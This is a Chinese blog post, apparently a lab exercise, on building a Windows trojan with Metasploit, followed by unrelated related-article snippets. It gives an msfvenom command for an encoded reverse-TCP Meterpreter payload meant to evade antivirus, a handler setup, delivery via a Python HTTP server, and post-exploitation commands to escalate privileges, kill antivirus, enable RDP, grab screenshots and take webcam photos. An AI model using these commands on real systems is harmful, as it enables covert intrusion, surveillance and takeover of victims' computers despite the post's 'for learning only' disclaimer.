msf渗透练习-生成木马控制window系统

news/2024/11/29 22:51:22/

说明:
本章内容,仅供学习,不要用于非法用途(做个好白帽)

(一)生成木马

命令:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.23.46 LPORT=4444 -e x86/shikata_ga_nai -f exe -o shell.exe -i 5

-p:设置payload,也就是要生成的可执行文件的类型和功能,这里选择的是Windows Meterpreter反向Shell。

        LHOST:指定Metasploit服务器(kali)监听的IP地址,

        LPORT:指定Metasploit服务器(kali)监听的端口,

-e:指定加密算法,这里使用的是shikata_ga_nai,这是一个简单的Polymorphic XOR加密算法,用来避免反病毒软件的检测。

-f:指定生成的可执行文件的格式,这里选择的是exe格式。

-o:指定生成的文件名为shell.exe。

-i:指定加密算法的迭代次数,即对生成的payload进行几次加密。
 

整个命令的意思是,将生成一个Windows反向TCP Meterpreter Shell的可执行文件,通过Metasploit连接到指定的主机和端口,使用shikata_ga_nai算法进行多次加密,生成exe格式的文件,存储为shell.exe。

 

 (二)配置监控

1、启动msf :msfconsole

2、载入监控模块  :use exploit/multi/handler

3、加载payload

 
4、查看plyload需要配置的参数

5、设置plyload的参数


6、开始监听:run

(三) 传播木马

当通过各种方法,各种路径传播木马到目标主机之后,等待目标主机运行木马程序,我们就能控制目标主机

这里练习我就用http服务传播

1、开启http服务:

  python2 -m SimpleHTTPServer 80 

2、靶机访问kali地址,下载木马文件

3、当用户运行木马程序,就可以出现

(四)后渗透

当利用木马成功控制window之后,就可以干我们像干的事情了,(不能用于非法用途,做个好白帽)

 

 

还有一些命令:

查看进程:ps

查看当前进程号:getpid

查看系统信息:sysinfo

查看目标机是否为虚拟机:run post/windows/gather/checkvm

查看完整网络设置:route

查看当前权限:getuid

自动提权:getsystem

关闭杀毒软件:run post/windows/manage/killav

启动远程桌面协议:run post/windows/manage/enable_rdp

列举当前登录的用户:run post/windows/gather/enum_logged_on_users

查看当前应用程序:run post/windows/gather/enum_applications

抓取目标机的屏幕截图:load espia ; screengrab

抓取摄像头的照片:webcam_snap

查看当前处于目标机的那个目录:pwd

查看当前目录:getlwd


http://www.ppmy.cn/news/348735.html

相关文章

HQChart实战教程62-自定义K线标题栏

HQChart实战教程62-自定义K线标题栏 K线标题栏步骤1. 替换k线标题格式化输出函数2. 格式化输出函数说明HQChart插件源码地址完整的demo源码K线标题栏 K线标题栏显示的是当前十字光标所在位置的K线信息,显示在K线窗口顶部。一般会显示品种的名称,周期,开,高,低,收,成交量…

H桥级联型五电平逆变器MATLAB仿真模型

H桥级联型五电平逆变器MATLAB仿真模型资源-CSDN文库https://download.csdn.net/download/weixin_56691527/87899094 模型简介: MATLAB21b版本 逆变器采用H桥级联的形式连接,加设LCL滤波器,三相负载构成主电路。 采用SPWM调制,可…

c语言编译、静态库、动态库

参考文献1&#xff1a;https://blog.csdn.net/zyhse/article/details/105228959 参考文献2&#xff1a;https://blog.csdn.net/flyztek/article/details/73612469 一.将*.cpp编译成可执行文件 1.编写程序文件 vim hello.cpp #include<stdio.h>int main(void){printf(…

【图像处理】基于收缩系数的粒子群优化和引力搜索算法的多级图像阈值研究【CPSOGSA】(Matlab代码实现)

&#x1f4a5;&#x1f4a5;&#x1f49e;&#x1f49e;欢迎来到本博客❤️❤️&#x1f4a5;&#x1f4a5; &#x1f3c6;博主优势&#xff1a;&#x1f31e;&#x1f31e;&#x1f31e;博客内容尽量做到思维缜密&#xff0c;逻辑清晰&#xff0c;为了方便读者。 ⛳️座右铭&a…

LeetCode!! 3. Longest Substring Without Repeating Characters

参考资料&#xff1a;左程云算法课 3. Longest Substring Without Repeating Characters Given a string s, find the length of the longest substring without repeating characters.Example 1:Input: s "abcabcbb" Output: 3 Explanation: The answer is "…

Geeks3D FurMark v1.26 显卡压力测试工具中文便携版带GPU-Z

前言 Geeks3D FurMark 是一款显卡压力测试工具&#xff0c;显卡性能测试软件&#xff0c;由oZone3D.net网站开发&#xff0c;通过皮毛渲染算法来衡量显卡的性能&#xff0c;同时还能借此考验显卡的稳定性&#xff0c;最低要求NVIDIA GeForce FX系列、ATI Radeon 9600系列、S3 …

furmark烤机工具设置中文教程

furmark是一款非常专业的显卡测试工具&#xff0c;但是不少用户下载打开发现竟然是英文版的&#xff0c;有什么办法可以设置中文&#xff0c;方便使用吗&#xff1f;针对这个问题&#xff0c;下面小编就给大家讲讲furmark设置中文的方法。 FurMark软件安装后打开程序&#xff0…

UG\NX二次开发 头文件及描述

文章作者:里海 来源网站:https://blog.csdn.net/WangPaiFeiXingYuan UG\NX二次开发 头文件及描述 头文件描述uf.hUG OPEN API的公共类型和函数定义